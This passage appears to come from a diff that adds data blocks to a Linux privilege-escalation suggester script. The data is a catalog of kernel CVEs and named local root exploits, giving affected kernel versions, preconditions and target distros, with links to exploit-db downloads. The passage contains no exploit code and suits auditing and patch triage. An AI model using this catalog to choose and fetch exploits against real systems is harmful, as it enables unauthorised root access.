CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 +CVE-2017-1000112 NETIF_F_UFO pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*} 1 CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels +CVE-2017-1000253 PIE_stack_corruption pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64 RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} 1 +CVE-2018-5333 rds_atomic_free_op NULL pointer dereference pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64 ubuntu=16.04{kernel:4.4.0|4.8.0} 1 rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR. +CVE-2018-14634 Mutagen Astronomy pkg=linux-kernel,x86_64,ver>=4.14.1,ver<=4.14.54 debian=8,RHEL=6|7 1 systems with less than 32GB of RAM are unlikely to be affected by this issue +CVE-2018-18955 subuid_shell pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ] ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} 1 CONFIG_USER_NS needs to be enabled +CVE-2019-13272 PTRACE_TRACEME pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64 ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*} 1 Requires an active PolKit agent. +EOF_DATA_3 +)" +KERNEL_CVE_DATA_4="$(cat <<'EOF_DATA_4' +CVE-2019-15666 XFRM_UAF pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y 1 CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled +CVE-2021-27365 linux-iscsi pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y RHEL=8 1 CONFIG_SLAB_FREELIST_HARDENED must not be enabled +CVE-2021-3490 eBPF ALU32 bounds tracking for bitwise ops pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*} 5 CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 +CVE-2021-3493 Ubuntu OverlayFS pkg=linux-kernel,ver>=3.13,ver<5.14,x86_64 ubuntu=(14.04|16.04|18.04|20.04|20.10) 1 Only Ubuntu is affected. +CVE-2021-22555 Netfilter heap out-of-bounds write pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6 ubuntu=20.04{kernel:5.8.0-*} 1 ip_tables kernel module must be loaded +CVE-2022-0847 DirtyPipe pkg=linux-kernel,ver>=5.8,ver<=5.16.11 ubuntu=(20.04|21.04),debian=11 1 +CVE-2022-0995 watch_queue pkg=linux-kernel,ver>=5.8,ver<5.16.5,x86_64 ubuntu=21.10{kernel:5.13.0.37-generic} 1 Not 100% reliable, may need to be run a couple of times. It rare cases it may panic the kernel. +CVE-2022-2586 nft_object UAF pkg=linux-kernel,ver>=5.12,ver<5.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=(20.04){kernel:5.12.13} 1 kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) +CVE-2022-32250 nft_object UAF (NFT_MSG_NEWSET) pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=(22.04){kernel:5.15.0-27-generic} 1 kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) +CVE-2023-0386 OverlayFS suid smuggle pkg=linux-kernel,ver>=5.11,ver<=6.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 ubuntu=22.04.1{kernel:5.15.0-57-generic} 1 CONFIG_USER_NS needs to be enabled && kernel.unprivileged_userns_clone=1 required +CVE-2024-1086 double-free in nf_tables pkg=linux-kernel,x86_64,ver>=5.14,ver<=6.6,CONFIG_NF_TABLES=y,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 debian=12,ubuntu=22.04 1 CONFIG_USER_NS and CONFIG_NF_TABLES need to be enabled && kernel.unprivileged_userns_clone=1 required +CVE-2021-3560 Polkit race authentication bypass cmd:sh -c "apt list --installed 2>/dev/null | grep -E 'polkit.*0\\.105-26' | grep -qEv 'ubuntu1\\.[1-9]' || yum list installed 2>/dev/null | grep -qE 'polkit.*\\(0\\.117-2\\|0\\.115-6\\|0\\.11[3-9]\\)' || rpm -qa 2>/dev/null | grep -qE 'polkit.*\\(0\\.117-2\\|0\\.115-6\\|0\\.11[3-9]\\)'" 1 Migrated from former standalone 1_system_information check +CVE-2025-38236 AF_UNIX MSG_OOB UAF pkg=linux-kernel,ver>=6.9.0 1 Migrated from former standalone 1_system_information check +CVE-2025-38352 POSIX CPU timers race pkg=linux-kernel,ver>=6.12,ver<6.12.34,CONFIG_POSIX_CPU_TIMERS_TASK_WORK!=y 1 Migrated from former standalone 1_system_information check +af_packet 2016-8655 4.4.0 http://www.exploit-db.com/exploits/40871 +american-sign-language 2010-4347 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.securityfocus.com/bid/45408 +ave 2.4.19,2.4.20 +brk 2.4.10,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22 +can_bcm 2010-2959 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/14814 +caps_to_root n/a 2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/15916 +clone_newuser N\A 3.3.5,3.3.4,3.3.2,3.2.13,3.2.9,3.2.1,3.1.8,3.0.5,3.0.4,3.0.2,3.0.1,3.2,3.0.1,3.0 http://www.exploit-db.com/exploits/38390 +dirty_cow 2016-5195 2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0 http://www.exploit-db.com/exploits/40616 +CVE-2010-0415 do_pages_move 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31 sieve 1 Spenders Enlightenment +elfcd 2.6.12 +elfdump 2.4.27 +EOF_DATA_4 +)" +KERNEL_CVE_DATA_5="$(cat <<'EOF_DATA_5' +elflbl 2.4.29 http://www.exploit-db.com/exploits/744 +exit_notify 2.6.25,2.6.26,2.6.27,2.6.28,2.6.29 http://www.exploit-db.com/exploits/8369 +exp.sh 2.6.9,2.6.10,2.6.16,2.6.13 +expand_stack 2.4.29 +CVE-2018-14665 exploit_x 2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6,3.8.0,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.14.0,3.15.0,3.16.0,3.17.0,3.18.0,3.19.0,4.0.0,4.1.0,4.2.0,4.3.0,4.4.0,4.5.0,4.6.0,4.7.0 1 http://www.exploit-db.com/exploits/45697 +ftrex 2008-4210 2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22 http://www.exploit-db.com/exploits/6851 +CVE-2017-16695 get_rekt 4.4.0,4.8.0,4.10.0,4.13.0 1 http://www.exploit-db.com/exploits/45010 +h00lyshit 2006-3626 2.6.8,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16 http://www.exploit-db.com/exploits/2013 +half_nelson1 2010-3848 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 econet http://www.exploit-db.com/exploits/17787 +half_nelson2 2010-3850 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 econet http://www.exploit-db.com/exploits/17787 +half_nelson3 2010-4073 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 econet http://www.exploit-db.com/exploits/17787 +kdump 2.6.13 +km2 2.4.18,2.4.22 +krad 2.6.5,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11 +krad3 2.6.5,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11 http://exploit-db.com/exploits/1397 +local26 2.6.13 +loginx 2.4.22 +loko 2.4.22,2.4.23,2.4.24 +memodipper 2012-0056 2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0 http://www.exploit-db.com/exploits/18411 +mremap_pte 2.4.20,2.2.24,2.4.25,2.4.26,2.4.27 http://www.exploit-db.com/exploits/160 +msr 2013-0268 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.5.0,3.6.0,3.7.0,3.7.6 http://www.exploit-db.com/exploits/27297 +newlocal 2.4.17,2.4.19 +newsmp 2.6 +ong_bak 2.6.5 +overlayfs 2015-8660 3.13.0,3.16.0,3.19.0 http://www.exploit-db.com/exploits/39230 +EOF_DATA_5 +)" +KERNEL_CVE_DATA_6="$(cat <<'EOF_DATA_6' +packet_set_ring 2017-7308 4.8.0 http://www.exploit-db.com/exploits/41994 +perf_swevent 2013-2094 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0,3.2.0,3.3.0,3.4.0,3.4.1,3.4.2,3.4.3,3.4.4,3.4.5,3.4.6,3.4.8,3.4.9,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9 http://www.exploit-db.com/exploits/26131 +pipe.c_32bit 2009-3547 2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31 http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c +pktcdvd 2010-3437 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/15150 +pp_key 2016-0728 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 http://www.exploit-db.com/exploits/39277 +prctl 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2004 +prctl2 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2005 +prctl3 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2006 +prctl4 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2011 +ptrace 2.4.18,2.4.19,2.4.20,2.4.21,2.4.22 +ptrace24 2.4.9 +CVE-2007-4573 ptrace_kmod 2.4.18,2.4.19,2.4.20,2.4.21,2.4.22 1 +ptrace_kmod2 2010-3301 2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34 ia32syscall,robert_you_suck http://www.exploit-db.com/exploits/15023 +pwned 2.6.11 +py2 2.6.9,2.6.17,2.6.15,2.6.13 +raptor_prctl 2006-2451 2.6.13,2.6.14,2.6.15,2.6.16,2.6.17 http://www.exploit-db.com/exploits/2031 +rawmodePTY 2014-0196 2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.14.0,3.15.0 http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c +rds 2010-3904 2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36 http://www.exploit-db.com/exploits/15285 +reiserfs 2010-1146 2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34 http://www.exploit-db.com/exploits/12130 +remap 2.4 +rip 2.2 +CVE-2008-4113 sctp 2.6.26 1 +semtex 2013-2094 2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0 http://www.exploit-db.com/exploits/25444 +smpracer 2.4.29 +sock_sendpage 2009-2692 2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30 wunderbar_emporium http://www.exploit-db.com/exploits/9435 +EOF_DATA_6 +)" +KERNEL_CVE_DATA_7="$(cat <<'EOF_DATA_7' +sock_sendpage2 2009-2692 2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30 proto_ops http://www.exploit-db.com/exploits/9436 +stackgrow2 2.4.29,2.6.10 +timeoutpwn 2014-0038 3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.9,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.5,3.8.6,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1 http://www.exploit-db.com/exploits/31346 +CVE-2009-1185 udev 2.6.25,2.6.26,2.6.27,2.6.28,2.6.29 udev <1.4.1 1 http://www.exploit-db.com/exploits/8478 +udp_sendmsg_32bit 2009-2698 2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19 http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c +uselib24 2.6.10,2.4.17,2.4.22,2.4.25,2.4.27,2.4.29 +CVE-2009-1046 vconsole 2.6 1 +video4linux 2010-3081 2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33 http://www.exploit-db.com/exploits/15024 +vmsplice1 2008-0600 2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.24.1 jessica biel http://www.exploit-db.com/exploits/5092 +vmsplice2 2008-0600 2.6.23,2.6.24 diane_lane http://www.exploit-db.com/exploits/5093 +w00t 2.4.10,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21 +CVE-2004-0186 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2007-4573 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2008-0009 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2008-0010 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2009-0065 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2009-1046 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2009-1185 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2009-1897 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2009-2910 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2009-3001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2010-0832 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2010-2240 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2010-2963 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2010-4170 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_7 +)" +KERNEL_CVE_DATA_8="$(cat <<'EOF_DATA_8' +CVE-2010-4258 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2011-1485 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2011-1493 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2011-2921 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2012-0809 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2013-1763 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2014-0476 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2014-3153 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2014-4322 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2014-5119 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2014-9322 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-0568 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-0570 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-1318 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-1805 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-1815 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-1862 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-3202 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-3246 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-3315 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-3636 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-5287 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-6565 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2015-8612 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-0819 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_8 +)" +KERNEL_CVE_DATA_9="$(cat <<'EOF_DATA_9' +CVE-2016-0820 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-10277 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-1240 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-1247 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-1531 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-1583 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-2059 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-2411 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-2434 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-2435 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-2475 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-2503 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-3857 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-3873 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-4989 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-5340 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-5425 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-6187 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-6662 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-6663 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-6664 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-6787 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-7117 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-8453 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2016-8633 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_9 +)" +KERNEL_CVE_DATA_10="$(cat <<'EOF_DATA_10' +CVE-2016-9566 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-0358 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-0403 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-0437 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-0569 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000251 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000363 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000366 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000367 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000370 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000371 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000379 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000380 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-1000405 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-10661 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-11176 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-16695 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2017-18344 catalog_reference_only 9999.9999.9999 0 Reference-only 